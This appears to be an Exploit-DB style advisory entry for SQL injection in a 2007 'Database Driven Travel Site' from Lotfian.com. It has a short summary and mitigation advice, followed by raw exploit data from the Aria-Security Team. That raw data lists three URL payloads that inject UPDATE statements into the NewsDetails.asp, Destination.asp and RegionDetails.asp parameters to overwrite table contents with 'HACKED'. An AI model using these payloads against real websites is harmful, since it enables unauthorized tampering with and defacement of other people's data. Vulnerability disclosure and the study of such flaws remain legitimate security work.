header-logo
Suggest Exploit
vendor:
Not mentioned
by:
Aria-Security Team
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Not mentioned
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: Not mentioned
Related CWE:
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2007

DATABASE DRIVEN TRAVEL SITE

The Lotfian.com travel site is vulnerable to SQL injection attacks through the NewsDetails.asp, Destination.asp, and RegionDetails.asp pages. An attacker can modify the SQL queries in the URL parameters to execute arbitrary SQL statements, potentially leading to unauthorized access, data manipulation, or data leakage.

Mitigation:

To mitigate the SQL injection vulnerability, the vendor should implement proper input validation and parameterized queries to prevent unauthorized SQL manipulation. Regular security audits and code reviews should also be conducted.
Source

Exploit-DB raw data:

Aria-Security Team
http://Aria-Security.Net
-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com

NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--

# milw0rm.com [2007-12-10]